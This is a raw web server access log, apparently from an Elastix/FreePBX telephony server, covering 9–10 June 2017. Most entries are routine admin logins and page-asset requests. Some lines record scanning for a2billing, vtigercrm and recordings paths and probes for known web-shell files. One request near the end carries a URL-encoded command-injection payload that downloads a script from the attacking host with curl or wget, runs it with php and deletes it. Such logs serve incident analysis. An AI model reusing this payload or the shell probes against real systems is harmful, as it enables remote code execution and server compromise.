                    87.181.110.35 - - [09/Jun/2017:16:52:03 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:53:45 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:54:04 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:16:55:00 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - - [09/Jun/2017:16:55:00 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    99.64.248.239 - - [09/Jun/2017:16:55:45 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:56:04 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:57:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:16:58:05 -0400] "POST / HTTP/1.1" 200 5409
                    99.64.248.239 - - [09/Jun/2017:16:59:46 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:00:05 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:02:06 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:04:07 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:06:07 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:17:06:08 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - - [09/Jun/2017:17:06:08 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    87.181.110.35 - - [09/Jun/2017:17:08:08 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:10:10 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:12:12 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:14:13 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:16:13 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:18:14 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:20:14 -0400] "POST / HTTP/1.1" 200 5409
                    87.181.110.35 - - [09/Jun/2017:17:22:15 -0400] "POST / HTTP/1.1" 200 5409
                    146.0.243.29 - - [09/Jun/2017:17:39:48 -0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
                    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    146.0.243.29 - - [09/Jun/2017:17:43:29 -0400] "GET /recordings/page.framework.php HTTP/1.1" 403 231
                    146.0.243.29 - - [09/Jun/2017:17:43:30 -0400] "GET /recordings/ HTTP/1.1" 200 6677
                    146.0.243.29 - - [09/Jun/2017:17:52:46 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
                    146.0.243.29 - - [09/Jun/2017:17:54:36 -0400] "GET /vtigercrm/test/upload/vtigercrm.txt HTTP/1.1" 404 233
                    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:18:00:23 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:00:23 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:18:11:31 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:18:11:31 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:19:05:42 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:05:42 -0400] "POST / HTTP/1.1" 200 5409
                    213.202.233.77 - - [09/Jun/2017:19:11:49 -0400] "GET /jnkp.php HTTP/1.1" 404 206
                    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
                    213.202.233.77 - - [09/Jun/2017:19:11:50 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
                    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
                    213.202.233.77 - - [09/Jun/2017:19:11:51 -0400] "GET /jnkp.php HTTP/1.1" 404 206
                    213.202.233.77 - - [09/Jun/2017:19:11:52 -0400] "GET /assets/jnkp.php HTTP/1.1" 404 213
                    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /asterisk/jnkp.php HTTP/1.1" 404 216
                    213.202.233.77 - - [09/Jun/2017:19:11:53 -0400] "GET /recordings/jnkp.php HTTP/1.1" 403 221
                    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - admin [09/Jun/2017:19:16:45 -0400] "GET /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST /admin/config.php HTTP/1.1" 200 1324
                    13.58.12.77 - - [09/Jun/2017:19:16:45 -0400] "POST / HTTP/1.1" 200 5409
                    163.172.69.33 - - [09/Jun/2017:19:44:46 -0400] "GET / HTTP/1.0" 400 362
                    163.172.69.33 - - [09/Jun/2017:19:44:49 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
                    163.172.69.33 - - [09/Jun/2017:19:48:53 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    163.172.69.33 - - [09/Jun/2017:19:48:55 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    163.172.69.33 - - [09/Jun/2017:19:49:43 -0400] "POST /recordings/index.php HTTP/1.1" 200 6780
                    163.172.69.33 - - [09/Jun/2017:19:49:46 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    137.116.71.170 - - [09/Jun/2017:19:58:21 -0400] "GET /robots.txt HTTP/1.1" 200 361
                    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:10:49 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:10:48 -0400] "POST / HTTP/1.1" 200 5409
                    163.172.64.146 - - [09/Jun/2017:20:12:42 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:20:21:53 -0400] "POST / HTTP/1.1" 200 5409
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:16:01 -0400] "POST / HTTP/1.1" 200 5409
                    200.116.88.105 - - [09/Jun/2017:21:16:50 -0400] "GET /a2billing/customer/javascript/misc.js HTTP/1.1" 404 235
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "GET /admin/config.php HTTP/1.1" 404 214
                    13.58.12.77 - - [09/Jun/2017:21:27:08 -0400] "POST / HTTP/1.1" 200 5409
                    23.239.70.162 - - [09/Jun/2017:22:19:20 -0400] "GET / HTTP/1.1" 200 5409
                    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET / HTTP/1.1" 200 5409
                    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
                    76.108.242.230 - - [09/Jun/2017:23:15:03 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-edwidgets.js HTTP/1.1" 200 3152
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-migrate-1.2.1.js HTTP/1.1" 200 16621
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-1.11.4.min.js HTTP/1.1" 200 240427
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colResizable-1.5.min.js HTTP/1.1" 200 5852
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-blockUI.js HTTP/1.1" 200 19910
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-1.11.2.min.js HTTP/1.1" 200 95931
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-ui-timepicker-addon.js HTTP/1.1" 200 78611
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-colorpicker.js HTTP/1.1" 200 17292
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/js/jquery/jquery-upl-easing.1.3.js HTTP/1.1" 200 8097
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/gsap/main-gsap.js HTTP/1.1" 200 99007
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/bootstrap.js HTTP/1.1" 200 58330
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/joinable.js HTTP/1.1" 200 119975
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/resizeable.js HTTP/1.1" 200 2406
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-api.js HTTP/1.1" 200 13926
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/jquery.validate.min.js HTTP/1.1" 200 21068
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-custom.js HTTP/1.1" 200 48302
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-login.js HTTP/1.1" 200 9031
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/js/neon-demo.js HTTP/1.1" 200 1964
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /themes/tenant/images/elastix_logo_mini.png HTTP/1.1" 200 6100
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /libs/font-icons/entypo/font/entypo.woff?71205724 HTTP/1.1" 200 40320
                    76.108.242.230 - - [09/Jun/2017:23:15:04 -0400] "GET /favicon.ico HTTP/1.1" 200 99678
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "POST / HTTP/1.1" 200 5409
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
                    76.108.242.230 - - [09/Jun/2017:23:15:21 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "POST / HTTP/1.1" 302 -
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /index.php HTTP/1.1" 200 70583
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/bootstrap.css HTTP/1.1" 200 218495
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/styles.css HTTP/1.1" 200 32972
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/help.css HTTP/1.1" 200 359
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/header.css HTTP/1.1" 200 9165
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/content.css HTTP/1.1" 200 7067
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/rightbar.css HTTP/1.1" 200 1254
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/jquery-ui-timepicker-addon.css HTTP/1.1" 200 1705
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/jquery-ui.min.css HTTP/1.1" 200 30021
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/css/smoothness/theme.css HTTP/1.1" 200 17279
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/css/1_style.css HTTP/1.1" 200 3056
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-core.css HTTP/1.1" 200 228653
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/applet.css HTTP/1.1" 200 1381
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/colorpicker.css HTTP/1.1" 200 3176
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/table.css HTTP/1.1" 200 6473
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/jquery/widgetcss/edwidgets.css HTTP/1.1" 200 1585
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/entypo/css/entypo.css HTTP/1.1" 200 17909
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/font-icons/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 26711
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/custom.css HTTP/1.1" 200 54
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/widgets.css HTTP/1.1" 200 485
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/base.js HTTP/1.1" 200 10924
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.css HTTP/1.1" 200 1825
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/sticky_note/sticky_note.js HTTP/1.1" 200 3207
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/1_javascript.js HTTP/1.1" 200 2324
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /libs/js/iframe.js HTTP/1.1" 200 314
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-theme.css HTTP/1.1" 200 178246
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /themes/tenant/css/neon-forms.css HTTP/1.1" 200 180501
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/3_jquery.flot.time.js HTTP/1.1" 200 11768
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/5_justgage-1.1.0.min.js HTTP/1.1" 200 14662
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/4_raphael-2.1.4.min.js HTTP/1.1" 200 92764
                    76.108.242.230 - - [09/Jun/2017:23:15:34 -0400] "GET /modules/dashboard/themes/default/js/2_jquery.flot.js HTTP/1.1" 200 122971
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/elastix_logo_mini2.png HTTP/1.1" 200 5487
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/Icon-user.png HTTP/1.1" 200 21664
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /themes/tenant/images/modalbox_bg.png HTTP/1.1" 200 1000
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/font-icons/font-awesome/fonts/fontawesome-webfont.woff2?v=4.4.0 HTTP/1.1" 200 64464
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /libs/js/jquery/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 200 208
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=registration&action=isRegistered&rawmode=yes HTTP/1.1" 200 178
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=PerformanceGraphic&action=getContent HTTP/1.1" 200 7518
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=getContent HTTP/1.1" 200 2339
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/js/javascript.js?=1497064534974 HTTP/1.1" 200 1363
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/SystemResources/tpl/css/styles.css HTTP/1.1" 200 223
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/images/applet_divisor.png HTTP/1.1" 200 998
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=getContent HTTP/1.1" 200 2155
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=HardDrives&action=getContent HTTP/1.1" 200 1913
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=ProcessesStatus&action=getContent HTTP/1.1" 200 8406
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/js/javascript.js?=1497064534975 HTTP/1.1" 200 628
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/CommunicationActivity/tpl/css/styles.css HTTP/1.1" 200 826
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/tpl/css/styles.css HTTP/1.1" 200 1065
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/js/javascript.js?=1497064534976 HTTP/1.1" 200 565
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_freespace.png HTTP/1.1" 200 958
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/HardDrives/images/light_usedspace.png HTTP/1.1" 200 958
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/tpl/css/styles.css HTTP/1.1" 200 1944
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/js/javascript.js?=1497064534977 HTTP/1.1" 200 2683
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_pbx.png HTTP/1.1" 200 2183
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_im.png HTTP/1.1" 200 2680
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/loading.gif HTTP/1.1" 200 2767
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown.png HTTP/1.1" 200 1015
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_fax.png HTTP/1.1" 200 1506
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_headphones.png HTTP/1.1" 200 1905
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_www.png HTTP/1.1" 200 2655
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_db.png HTTP/1.1" 200 1637
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_email.png HTTP/1.1" 200 1998
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/icon_arrowdown-disabled.png HTTP/1.1" 200 190
                    76.108.242.230 - - [09/Jun/2017:23:15:36 -0400] "GET /modules/dashboard/applets/ProcessesStatus/images/bgicon.png HTTP/1.1" 200 1018
                    76.108.242.230 - - [09/Jun/2017:23:15:35 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=News&action=getContent HTTP/1.1" 200 4889
                    76.108.242.230 - - [09/Jun/2017:23:15:38 -0400] "GET /modules/dashboard/applets/News/tpl/css/styles.css HTTP/1.1" 200 934
                    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=SystemResources&action=updateStatus HTTP/1.1" 200 98
                    76.108.242.230 - - [09/Jun/2017:23:15:41 -0400] "GET /index.php?menu=dashboard&rawmode=yes&applet=CommunicationActivity&action=updateStatus HTTP/1.1" 200 83
                    76.108.242.230 - - [09/Jun/2017:23:15:44 -0400] "GET /index.php?menu=pbxadmin HTTP/1.1" 500 -
                    76.108.242.230 - - [09/Jun/2017:23:15:45 -0400] "GET /index.php HTTP/1.1" 500 -
                    92.114.32.161 - - [09/Jun/2017:23:39:42 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
                    92.114.32.161 - - [09/Jun/2017:23:39:43 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
                    92.114.32.161 - - [09/Jun/2017:23:53:55 -0400] "GET /recordings/ HTTP/1.1" 500 -
                    92.114.32.161 - - [09/Jun/2017:23:53:56 -0400] "GET /recordings/ HTTP/1.1" 500 -
                    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET /recordings/ HTTP/1.1" 500 -
                    92.114.32.161 - - [10/Jun/2017:00:17:47 -0400] "GET / HTTP/1.0" 400 362
                    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 404 225
                    92.114.32.161 - - [10/Jun/2017:00:24:24 -0400] "GET / HTTP/1.0" 400 362
                    163.172.64.146 - - [10/Jun/2017:04:53:29 -0400] "GET /a2billing/admin/Public/index.php HTTP/1.1" 404 230
                    51.15.12.13 - - [10/Jun/2017:04:55:41 -0400] "GET /recordings/index.php HTTP/1.1" 500 -
                    51.15.12.13 - - [10/Jun/2017:04:55:42 -0400] "POST /admin/ajax.php?module=music HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:44 -0400] "POST /admin/ajax.php?module=blacklist HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:45 -0400] "POST /admin/ajax.php?module=recordings HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:46 -0400] "GET /admin/ajax.php HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:55:47 -0400] "GET /admin/config.php?display=OpenVAS&handler=api&file=OpenVAS&module=OpenVAS&function=system&args=id HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:55:48 -0400] "GET /admin/modules/backup/page.backup.php HTTP/1.1" 404 234
                    51.15.12.13 - - [10/Jun/2017:04:55:49 -0400] "POST /vtigercrm/phprint.php HTTP/1.1" 404 219
                    51.15.12.13 - - [10/Jun/2017:04:55:50 -0400] "POST / HTTP/1.1" 200 5409
                    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /admin/modules/admindashboard/phpsysinfo/common_admin_functions.php?c=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 264
                    51.15.12.13 - - [10/Jun/2017:04:55:51 -0400] "POST /recordings/jeep.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /admin/bootstrap.inc.php?mgp=danc3Uf%40t HTTP/1.1" 404 221
                    51.15.12.13 - - [10/Jun/2017:04:55:52 -0400] "POST /recordings/a7a.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad-shell.php HTTP/1.1" 403 227
                    51.15.12.13 - - [10/Jun/2017:04:55:53 -0400] "POST /recordings/emad.php HTTP/1.1" 403 221
